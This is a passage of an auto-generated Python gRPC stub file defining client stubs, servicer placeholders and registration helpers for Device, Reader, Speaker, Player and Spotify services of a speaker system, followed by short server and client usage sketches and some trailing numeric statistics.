def SetName(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Device/SetName',
speaker_dot_system__pb2.DeviceName.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
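# --- Illustrative server wiring (added sketch, not part of the generated file) ---
# Standard grpc.server() pattern for exposing the Device service defined
# above; MyDeviceServicer and the port are placeholders for illustration.
from concurrent import futures

class MyDeviceServicer(DeviceServicer):
    """Example servicer that returns an empty DeviceInfo message."""
    def GetInfo(self, request, context):
        return speaker_dot_system__pb2.DeviceInfo()

def _example_serve():
    server = grpc.server(futures.ThreadPoolExecutor(max_workers=4))
    add_DeviceServicer_to_server(MyDeviceServicer(), server)
    server.add_insecure_port('[::]:50051')
    server.start()
    server.wait_for_termination()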
class ReaderStub(object):
"""Missing associated documentation comment in .proto file"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetInputList = channel.unary_stream(
'/Reader/GetInputList',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.InputInfo.FromString,
)
self.GetStatus = channel.unary_unary(
'/Reader/GetStatus',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.ReaderStatus.FromString,
)
self.SetMute = channel.unary_unary(
'/Reader/SetMute',
request_serializer=speaker_dot_system__pb2.MuteValue.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.SetVolume = channel.unary_unary(
'/Reader/SetVolume',
request_serializer=speaker_dot_system__pb2.VolumeSingleValue.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
class ReaderServicer(object):
"""Missing associated documentation comment in .proto file"""
def GetInputList(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetStatus(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetMute(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetVolume(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_ReaderServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetInputList': grpc.unary_stream_rpc_method_handler(
servicer.GetInputList,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.InputInfo.SerializeToString,
),
'GetStatus': grpc.unary_unary_rpc_method_handler(
servicer.GetStatus,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.ReaderStatus.SerializeToString,
),
'SetMute': grpc.unary_unary_rpc_method_handler(
servicer.SetMute,
request_deserializer=speaker_dot_system__pb2.MuteValue.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'SetVolume': grpc.unary_unary_rpc_method_handler(
servicer.SetVolume,
request_deserializer=speaker_dot_system__pb2.VolumeSingleValue.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'Reader', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Reader(object):
"""Missing associated documentation comment in .proto file"""
@staticmethod
def GetInputList(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_stream(request, target, '/Reader/GetInputList',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.InputInfo.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetStatus(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Reader/GetStatus',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.ReaderStatus.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetMute(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Reader/SetMute',
speaker_dot_system__pb2.MuteValue.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetVolume(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Reader/SetVolume',
speaker_dot_system__pb2.VolumeSingleValue.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
class SpeakerStub(object):
"""Missing associated documentation comment in .proto file"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetConnectedStreams = channel.unary_stream(
'/Speaker/GetConnectedStreams',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.SpeakerStreamInfo.FromString,
)
self.GetStatus = channel.unary_unary(
'/Speaker/GetStatus',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.SpeakerStatus.FromString,
)
self.SetMute = channel.unary_unary(
'/Speaker/SetMute',
request_serializer=speaker_dot_system__pb2.MuteValue.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.SetVolume = channel.unary_unary(
'/Speaker/SetVolume',
request_serializer=speaker_dot_system__pb2.VolumeValues.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.SetVolumeUniform = channel.unary_unary(
'/Speaker/SetVolumeUniform',
request_serializer=speaker_dot_system__pb2.VolumeSingleValue.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.ConnectStreams = channel.stream_unary(
'/Speaker/ConnectStreams',
request_serializer=speaker_dot_system__pb2.ServerHost.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.DisconnectStreams = channel.stream_unary(
'/Speaker/DisconnectStreams',
request_serializer=speaker_dot_system__pb2.ServerIdent.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.DisconnectAllStreams = channel.unary_unary(
'/Speaker/DisconnectAllStreams',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
class SpeakerServicer(object):
"""Missing associated documentation comment in .proto file"""
def GetConnectedStreams(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetStatus(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetMute(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetVolume(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetVolumeUniform(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ConnectStreams(self, request_iterator, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DisconnectStreams(self, request_iterator, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DisconnectAllStreams(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_SpeakerServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetConnectedStreams': grpc.unary_stream_rpc_method_handler(
servicer.GetConnectedStreams,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.SpeakerStreamInfo.SerializeToString,
),
'GetStatus': grpc.unary_unary_rpc_method_handler(
servicer.GetStatus,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.SpeakerStatus.SerializeToString,
),
'SetMute': grpc.unary_unary_rpc_method_handler(
servicer.SetMute,
request_deserializer=speaker_dot_system__pb2.MuteValue.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'SetVolume': grpc.unary_unary_rpc_method_handler(
servicer.SetVolume,
request_deserializer=speaker_dot_system__pb2.VolumeValues.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'SetVolumeUniform': grpc.unary_unary_rpc_method_handler(
servicer.SetVolumeUniform,
request_deserializer=speaker_dot_system__pb2.VolumeSingleValue.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'ConnectStreams': grpc.stream_unary_rpc_method_handler(
servicer.ConnectStreams,
request_deserializer=speaker_dot_system__pb2.ServerHost.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'DisconnectStreams': grpc.stream_unary_rpc_method_handler(
servicer.DisconnectStreams,
request_deserializer=speaker_dot_system__pb2.ServerIdent.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'DisconnectAllStreams': grpc.unary_unary_rpc_method_handler(
servicer.DisconnectAllStreams,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'Speaker', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Speaker(object):
"""Missing associated documentation comment in .proto file"""
@staticmethod
def GetConnectedStreams(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_stream(request, target, '/Speaker/GetConnectedStreams',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.SpeakerStreamInfo.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetStatus(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Speaker/GetStatus',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.SpeakerStatus.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetMute(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Speaker/SetMute',
speaker_dot_system__pb2.MuteValue.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetVolume(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Speaker/SetVolume',
speaker_dot_system__pb2.VolumeValues.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetVolumeUniform(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Speaker/SetVolumeUniform',
speaker_dot_system__pb2.VolumeSingleValue.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ConnectStreams(request_iterator,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.stream_unary(request_iterator, target, '/Speaker/ConnectStreams',
speaker_dot_system__pb2.ServerHost.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DisconnectStreams(request_iterator,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.stream_unary(request_iterator, target, '/Speaker/DisconnectStreams',
speaker_dot_system__pb2.ServerIdent.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DisconnectAllStreams(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Speaker/DisconnectAllStreams',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
class PlayerStub(object):
"""Missing associated documentation comment in .proto file"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetStatus = channel.unary_unary(
'/Player/GetStatus',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.PlayerStatus.FromString,
)
self.Start = channel.unary_unary(
'/Player/Start',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.Stop = channel.unary_unary(
'/Player/Stop',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.SetLocation = channel.unary_unary(
'/Player/SetLocation',
request_serializer=speaker_dot_system__pb2.PlayerLocation.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.SetMute = channel.unary_unary(
'/Player/SetMute',
request_serializer=speaker_dot_system__pb2.MuteValue.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.SetVolume = channel.unary_unary(
'/Player/SetVolume',
request_serializer=speaker_dot_system__pb2.VolumeSingleValue.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
class PlayerServicer(object):
"""Missing associated documentation comment in .proto file"""
def GetStatus(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Start(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Stop(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetLocation(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetMute(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetVolume(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_PlayerServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetStatus': grpc.unary_unary_rpc_method_handler(
servicer.GetStatus,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.PlayerStatus.SerializeToString,
),
'Start': grpc.unary_unary_rpc_method_handler(
servicer.Start,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'Stop': grpc.unary_unary_rpc_method_handler(
servicer.Stop,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'SetLocation': grpc.unary_unary_rpc_method_handler(
servicer.SetLocation,
request_deserializer=speaker_dot_system__pb2.PlayerLocation.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'SetMute': grpc.unary_unary_rpc_method_handler(
servicer.SetMute,
request_deserializer=speaker_dot_system__pb2.MuteValue.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'SetVolume': grpc.unary_unary_rpc_method_handler(
servicer.SetVolume,
request_deserializer=speaker_dot_system__pb2.VolumeSingleValue.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'Player', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Player(object):
"""Missing associated documentation comment in .proto file"""
@staticmethod
def GetStatus(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Player/GetStatus',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.PlayerStatus.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Start(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Player/Start',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Stop(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Player/Stop',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetLocation(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Player/SetLocation',
speaker_dot_system__pb2.PlayerLocation.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetMute(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Player/SetMute',
speaker_dot_system__pb2.MuteValue.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetVolume(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Player/SetVolume',
speaker_dot_system__pb2.VolumeSingleValue.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
class SpotifyStub(object):
"""Missing associated documentation comment in .proto file"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetCredentials = channel.unary_unary(
'/Spotify/GetCredentials',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.SpotifyCredentials.FromString,
)
self.GetOptions = channel.unary_unary(
'/Spotify/GetOptions',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.SpotifyOptions.FromString,
)
self.GetStatus = channel.unary_unary(
'/Spotify/GetStatus',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.SpotifyStatus.FromString,
)
self.Start = channel.unary_unary(
'/Spotify/Start',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.Stop = channel.unary_unary(
'/Spotify/Stop',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.SetCredentials = channel.unary_unary(
'/Spotify/SetCredentials',
request_serializer=speaker_dot_system__pb2.SpotifyCredentials.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.SetBitRate = channel.unary_unary(
'/Spotify/SetBitRate',
request_serializer=speaker_dot_system__pb2.SpotifyOptBitRate.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.SetName = channel.unary_unary(
'/Spotify/SetName',
request_serializer=speaker_dot_system__pb2.SpotifyOptName.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
class SpotifyServicer(object):
"""Missing associated documentation comment in .proto file"""
def GetCredentials(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetOptions(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetStatus(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Start(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Stop(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetCredentials(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetBitRate(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetName(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_SpotifyServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetCredentials': grpc.unary_unary_rpc_method_handler(
servicer.GetCredentials,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.SpotifyCredentials.SerializeToString,
),
'GetOptions': grpc.unary_unary_rpc_method_handler(
servicer.GetOptions,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.SpotifyOptions.SerializeToString,
),
'GetStatus': grpc.unary_unary_rpc_method_handler(
servicer.GetStatus,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.SpotifyStatus.SerializeToString,
),
'Start': grpc.unary_unary_rpc_method_handler(
servicer.Start,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'Stop': grpc.unary_unary_rpc_method_handler(
servicer.Stop,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'SetCredentials': grpc.unary_unary_rpc_method_handler(
servicer.SetCredentials,
request_deserializer=speaker_dot_system__pb2.SpotifyCredentials.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'SetBitRate': grpc.unary_unary_rpc_method_handler(
servicer.SetBitRate,
request_deserializer=speaker_dot_system__pb2.SpotifyOptBitRate.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'SetName': grpc.unary_unary_rpc_method_handler(
servicer.SetName,
request_deserializer=speaker_dot_system__pb2.SpotifyOptName.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'Spotify', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Spotify(object):
"""Missing associated documentation comment in .proto file"""
@staticmethod
def GetCredentials(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Spotify/GetCredentials',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.SpotifyCredentials.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetOptions(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Spotify/GetOptions',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.SpotifyOptions.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetStatus(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Spotify/GetStatus',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.SpotifyStatus.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Start(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Spotify/Start',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Stop(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Spotify/Stop',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetCredentials(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Spotify/SetCredentials',
speaker_dot_system__pb2.SpotifyCredentials.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetBitRate(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Spotify/SetBitRate',
speaker_dot_system__pb2.SpotifyOptBitRate.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetName(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Spotify/SetName',
speaker_dot_system__pb2.SpotifyOptName.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
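# ---------------------------------------------------------------------------
# Hedged usage sketch (editorial addition, not emitted by the protoc plugin).
# It shows one way to drive the Speaker service through the SpeakerStub defined
# above. The endpoint "localhost:50051" is an assumption; no address appears in
# the generated code, and the call simply reports an error if no server is up.
if __name__ == "__main__":
    with grpc.insecure_channel("localhost:50051") as channel:
        speaker = SpeakerStub(channel)
        try:
            # GetStatus takes google.protobuf.Empty, so no message fields have
            # to be guessed here.
            status = speaker.GetStatus(
                google_dot_protobuf_dot_empty__pb2.Empty(), timeout=5)
            print(status)
        except grpc.RpcError as exc:
            print("Speaker service unavailable:", exc.code())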
| 43.522073
| 101
| 0.656295
| 4,174
| 45,350
| 6.788213
| 0.032343
| 0.040658
| 0.071716
| 0.085163
| 0.930543
| 0.922178
| 0.87785
| 0.844498
| 0.844498
| 0.820922
| 0
| 0.005197
| 0.270165
| 45,350
| 1,041
| 102
| 43.563881
| 0.850867
| 0.064741
| 0
